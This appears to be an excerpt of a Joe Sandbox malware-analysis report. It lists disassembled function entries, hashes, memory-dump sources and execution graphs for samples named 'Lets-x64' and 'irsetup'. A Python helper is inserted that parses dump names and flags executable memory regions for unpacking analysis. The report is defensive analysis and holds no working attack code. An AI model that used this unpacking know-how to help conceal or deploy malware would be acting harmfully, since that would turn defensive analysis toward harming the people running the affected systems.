• Instruction Fuzzy Hash: 6F215172A59B81C6EBA19F31A50102A77B4FF88BC1B485039DA4F4BB58DF3CE450C70A
APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3106088686-0
                                                                                                                    • Opcode ID: 05f7958800d00bfde8268114ee56b592e211f2a19b1f485bd1a84abf12047c02
                                                                                                                    • Instruction ID: 229845faf1512139060dc0b5f9993bdd3334ee2bcc252498e2b705a30764d339
                                                                                                                    • Opcode Fuzzy Hash: 05f7958800d00bfde8268114ee56b592e211f2a19b1f485bd1a84abf12047c02
                                                                                                                    • Instruction Fuzzy Hash: 8B017130A1D743C2FB959B75A44503926B1AF48BA0B08423DC92FCA3C1EE3CE844C71A
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 307345228-0
                                                                                                                    • Opcode ID: d313151686294f25f8f7d21e385e2467862330813931e0bf0385d1da5e86bfe5
                                                                                                                    • Instruction ID: 18ae6abddc66167db4bf00d8b69093dab4d98db8cf977bbe9e9eefd30787c07a
                                                                                                                    • Opcode Fuzzy Hash: d313151686294f25f8f7d21e385e2467862330813931e0bf0385d1da5e86bfe5
                                                                                                                    • Instruction Fuzzy Hash: CD41B632A09741C6EB90CF3598001A967E5FF44BA8F184639EE2E8BBD5DF3DE4018305
                                                                                                                    APIs
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF6688538AD
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF6688538BD
                                                                                                                      • Part of subcall function 00007FF668855C10: _errno.LIBCMT ref: 00007FF668855C19
                                                                                                                      • Part of subcall function 00007FF668855C10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF668855C24
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF66885393B
                                                                                                                      • Part of subcall function 00007FF668854ED8: realloc.LIBCMT ref: 00007FF668854F03
                                                                                                                      • Part of subcall function 00007FF668854ED8: Sleep.KERNEL32(?,?,00000000,00007FF66885392B,?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF668854F1F
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF66885394B
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF668853958
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1909145217-0
                                                                                                                    • Opcode ID: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
                                                                                                                    • Instruction ID: 03360143bb99c00df0069902ed0cf30af0d4966680d625db9818c2a509a515c7
                                                                                                                    • Opcode Fuzzy Hash: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
                                                                                                                    • Instruction Fuzzy Hash: 4221B171B5A742C1EA819B31E90806AA371BF4ABD1F44483DDA4FDF354DE3CE985830A
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directorylstrlen$CreateCurrentlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 279805598-0
                                                                                                                    • Opcode ID: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
                                                                                                                    • Instruction ID: d1bc39b112cd224cb6eea60b4c6fde54c62f877f9b092d5f8806e0804540fcd9
                                                                                                                    • Opcode Fuzzy Hash: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
                                                                                                                    • Instruction Fuzzy Hash: 74218235B18B82C5F7B0CB36E49427A23B5EF49784F848139CA8E8AA55DE3CD5058705
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                    • Opcode ID: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
                                                                                                                    • Instruction ID: 37209bf5189160bce845fbd209ab841d0cbcf1aa0240655c62bac3e6c68bcd35
                                                                                                                    • Opcode Fuzzy Hash: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
                                                                                                                    • Instruction Fuzzy Hash: 60E0EC30BA5702C2EF995B71A84413612B06F58740B48503EC91FCA394EF2CB989830A
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 27599310-0
                                                                                                                    • Opcode ID: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
                                                                                                                    • Instruction ID: 39ad615607f997594a59c3d885b1eb9431280530804a348fc4eccf062fcf99c5
                                                                                                                    • Opcode Fuzzy Hash: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
                                                                                                                    • Instruction Fuzzy Hash: 1D516F32A4C742C2EAE59B75A84423A66B1EF86740F14453DE95FCB694CF3CED45830B
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _amsg_exit$_getptd_lockfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148533958-0
                                                                                                                    • Opcode ID: 628d5342cbd1e67f1f3a3b6805dd6a854c1c623084b3b0db614e7cb17b0d6585
                                                                                                                    • Instruction ID: a975fd143a288cc283ff3a218d3687a6d3e985a136069b7d6195a48fee7bfff4
                                                                                                                    • Opcode Fuzzy Hash: 628d5342cbd1e67f1f3a3b6805dd6a854c1c623084b3b0db614e7cb17b0d6585
                                                                                                                    • Instruction Fuzzy Hash: E511EA36A19781C2EAD59B30E44077973B1EF48740F080039DA0F8B796CF2CF454CA0A
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _amsg_exit_getptd$_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3670291111-0
                                                                                                                    • Opcode ID: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
                                                                                                                    • Instruction ID: e81f90cebff8d22734cf2e5560cd2ef7cff8506c154ba0aeace9b7e3bde63528
                                                                                                                    • Opcode Fuzzy Hash: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
                                                                                                                    • Instruction Fuzzy Hash: A1F0F931A1A342C6FAD8AB7588427F82271AF59744F08123CDA0E8F3D2DF5CA840C71A
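Every function entry above points at the same set of memory dumps, named in Joe Sandbox's dotted .sdmp form (for example 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp). When you are deciding which dumps to pull apart for the "creates a PE file in dynamic memory" signature, the useful fields are the region base, the page protection and the memory type. The parser below is an added example, not part of this report or of Joe Sandbox; the field layout (process index, dump stage, unique id, region base, protection, a flag field of unknown meaning, memory type, index) is inferred from the names on this page and is an assumption. The protection and type values are decoded with the winnt.h PAGE_* and MEM_* constants, which match the dumps listed here (0x20 PAGE_EXECUTE_READ for the code section, 0x02 PAGE_READONLY for headers and .rdata, 0x04 PAGE_READWRITE for .data, 0x1000000 MEM_IMAGE for all five). The sixth dump name is constructed to show what a writable and executable private region would look like.

```python
"""Parse Joe Sandbox memory-dump (.sdmp) names into region metadata and flag
regions worth pulling for unpacking analysis.

Added example; not part of the Joe Sandbox report.  The field layout is
inferred from the names listed on this page (process index, dump stage,
unique id, region base, page protection, a flag field of unknown meaning,
memory type, index); treat that layout as an assumption.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# winnt.h memory protection and memory type constants
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0xF0   # any PAGE_EXECUTE* value
WRITE_MASK = 0xCC  # PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Assumed layout: proc.stage.uid.base.protect.flag.mtype.idx.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<flag>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<idx>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    name: str
    process: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def is_image(self) -> bool:
        return self.mem_type == 0x1000000

    def describe(self) -> str:
        prot = PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:X}")
        kind = MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")
        return f"pid#{self.process} {self.base:#018x} {prot} {kind}"


def parse_sdmp(name: str) -> Region:
    """Split one dump file name into its fields; raises ValueError on any other name."""
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return Region(
        name=name.strip(),
        process=int(m["proc"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["mtype"], 16),
    )


def triage(names: Iterable[str]) -> List[Tuple[Region, str]]:
    """Return (region, reason) for dumps that deserve a look when hunting for
    unpacked code: writable+executable pages, or executable pages that are not
    backed by a mapped image.  Image-backed, non-writable code is the normal case."""
    findings = []
    for region in map(parse_sdmp, names):
        if region.executable and region.writable:
            findings.append((region, "RWX region"))
        elif region.executable and not region.is_image:
            findings.append((region, "executable non-image memory"))
    return findings


# The five dump names listed under "Memory Dump Source" on this page.
PAGE_DUMPS = [
    "00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp",
]
# Constructed name (not from the report): a PAGE_EXECUTE_READWRITE private
# allocation, the shape an unpacker's staging buffer usually has.
CONSTRUCTED_RWX = "00000000.00000002.2187700000.0000000002A10000.00000040.00000001.00020000.00000000.sdmp"

if __name__ == "__main__":
    for r in map(parse_sdmp, PAGE_DUMPS):
        print(r.describe())
    for r, why in triage(PAGE_DUMPS + [CONSTRUCTED_RWX]):
        print("FLAG", why, r.describe())
```

Run against the five names from this report, triage() returns nothing: all of them are image-backed and the only executable region is read-only, which is what a cleanly mapped PE looks like. The constructed RWX private region is the one that gets flagged; that is the region you would carve and feed to the same IDA plugin workflow shown above.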

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:392
                                                                                                                    Total number of Limit Nodes:15
                                                                                                                    execution_graph 24715 18000c302 24716 180019380 24715->24716 24717 1800193c0 24716->24717 24721 1800108a0 24716->24721 24719 1800108a0 91 API calls 24717->24719 24720 1800193d7 24719->24720 24727 18001f238 24721->24727 24744 1800034f0 24721->24744 24722 1800108ce 24723 1800108e6 24722->24723 24765 18000a760 91 API calls 24722->24765 24723->24717 24728 18001f252 24727->24728 24729 18001f25c 24727->24729 24766 18002d3e0 24728->24766 24731 18001f261 24729->24731 24737 18001f268 malloc 24729->24737 24780 18001f30c 24731->24780 24733 18001f2b1 malloc 24786 18001e8e4 47 API calls __doserrno 24733->24786 24734 18001f26e HeapReAlloc 24735 18001f25a free 24734->24735 24734->24737 24735->24722 24736 18001f2ef 24788 18001e8e4 47 API calls __doserrno 24736->24788 24737->24733 24737->24734 24737->24736 24741 18001f2d6 24737->24741 24740 18001f2f4 GetLastError 24740->24735 24787 18001e8e4 47 API calls __doserrno 24741->24787 24743 18001f2db GetLastError 24743->24735 24745 18000350b 24744->24745 24746 1800034fc 24744->24746 24748 18001f252 24745->24748 24749 18001f25c 24745->24749 24747 18001f30c free 47 API calls 24746->24747 24750 180003504 24747->24750 24751 18002d3e0 malloc 47 API calls 24748->24751 24752 18001f261 24749->24752 24757 18001f268 malloc 24749->24757 24750->24722 24761 18001f25a free 24751->24761 24753 18001f30c free 47 API calls 24752->24753 24753->24761 24754 18001f2b1 malloc 24796 18001e8e4 47 API calls __doserrno 24754->24796 24755 18001f26e HeapReAlloc 24755->24757 24755->24761 24756 18001f2ef 24798 18001e8e4 47 API calls __doserrno 24756->24798 24757->24754 24757->24755 24757->24756 24762 18001f2d6 24757->24762 24760 18001f2f4 GetLastError 24760->24761 24761->24722 24797 18001e8e4 47 API calls __doserrno 24762->24797 24764 18001f2db GetLastError 24764->24761 24768 18002d474 malloc 24766->24768 24777 18002d3f8 malloc 24766->24777 24767 

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000000018002D374: HeapCreate.KERNEL32(?,?,?,?,0000000180029E89), ref: 000000018002D386
                                                                                                                      • Part of subcall function 000000018002D374: HeapSetInformation.KERNEL32 ref: 000000018002D3B0
                                                                                                                    • _RTC_Initialize.LIBCMT ref: 0000000180029EA4
                                                                                                                    • GetCommandLineA.KERNEL32 ref: 0000000180029EA9
                                                                                                                      • Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
                                                                                                                      • Part of subcall function 0000000180038D00: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F
                                                                                                                      • Part of subcall function 000000018002C830: GetStartupInfoA.KERNEL32 ref: 000000018002C855
                                                                                                                    • __setargv.LIBCMT ref: 0000000180029ED2
                                                                                                                    • _cinit.LIBCMT ref: 0000000180029EE6
                                                                                                                      • Part of subcall function 000000018002C178: FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
                                                                                                                      • Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
                                                                                                                      • Part of subcall function 000000018002C178: free.LIBCMT ref: 000000018002D1AF
                                                                                                                      • Part of subcall function 000000018002C178: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF
                                                                                                                      • Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D
                                                                                                                    • FlsSetValue.KERNEL32 ref: 0000000180029F6C
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0000000180029F80
                                                                                                                    • free.LIBCMT ref: 0000000180029F8F
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1549890855-0
                                                                                                                    • Opcode ID: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
                                                                                                                    • Instruction ID: 5d89b5062d79ddf7cbf42b6751900f03d5044372f9c69ff6a2a4972f2435356c
                                                                                                                    • Opcode Fuzzy Hash: a0acf61c1b87e16a772799abe4b62362619cbdfa8acdc2e6844dc3a99a0f0c98
                                                                                                                    • Instruction Fuzzy Hash: CC315A3060260D85FEE7B7F096423FE13946F5D3D4F22C525B916852E7EE258B8C8322

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • _getptd.LIBCMT ref: 000000018002E8C3
                                                                                                                      • Part of subcall function 000000018002E59C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,000000018002E8DE,?,?,?,?,?,000000018002EAB3), ref: 000000018002E5C6
                                                                                                                      • Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
                                                                                                                      • Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
                                                                                                                    • free.LIBCMT ref: 000000018002E94F
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    • _lock.LIBCMT ref: 000000018002E987
                                                                                                                    • free.LIBCMT ref: 000000018002EA37
                                                                                                                    • free.LIBCMT ref: 000000018002EA67
                                                                                                                    • _errno.LIBCMT ref: 000000018002EA6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2878544890-0
                                                                                                                    • Opcode ID: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
                                                                                                                    • Instruction ID: c776ccf790241ac67246d89d90e9fa713756aa25b18aceaf8fd82d01af155c51
                                                                                                                    • Opcode Fuzzy Hash: e82f143c23f227001045ea17cfd9d9e54a22bd3adced516c1c47190338206767
                                                                                                                    • Instruction Fuzzy Hash: CB51B231600A8886E7E39B65A4403E9B7A1F78ABD8F14C216FA5E473A5CF78D649C701

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 149 18002d374-18002d396 HeapCreate 150 18002d398-18002d3b6 HeapSetInformation 149->150 151 18002d3bb-18002d3bf 149->151 150->151
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateInformation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1774340351-0
                                                                                                                    • Opcode ID: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
                                                                                                                    • Instruction ID: d86c038a14694898d099bceb00610aad7d4d496ac8821e0f5eb4db07846aa6a7
                                                                                                                    • Opcode Fuzzy Hash: 39044132f5a22a3317da2d95eb259efacad0cdd120c364843a2d6d13d7c05708
                                                                                                                    • Instruction Fuzzy Hash: 30E04F75621B84C2F7DAAB21E8457A66290F78C380F909029F94942B94DF7DC2498B00

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 221 18002bf5c-18002bf75 222 18002bf78-18002bf7b call 18002d3e0 221->222 224 18002bf80-18002bf86 222->224 225 18002bf88-18002bf8e 224->225 226 18002bfb0-18002bfc7 224->226 225->226 227 18002bf90-18002bfae Sleep 225->227 227->222 227->226
                                                                                                                    APIs
                                                                                                                    • malloc.LIBCMT ref: 000000018002BF7B
                                                                                                                      • Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
                                                                                                                      • Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464
                                                                                                                    • Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$AllocHeapSleepmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 496785850-0
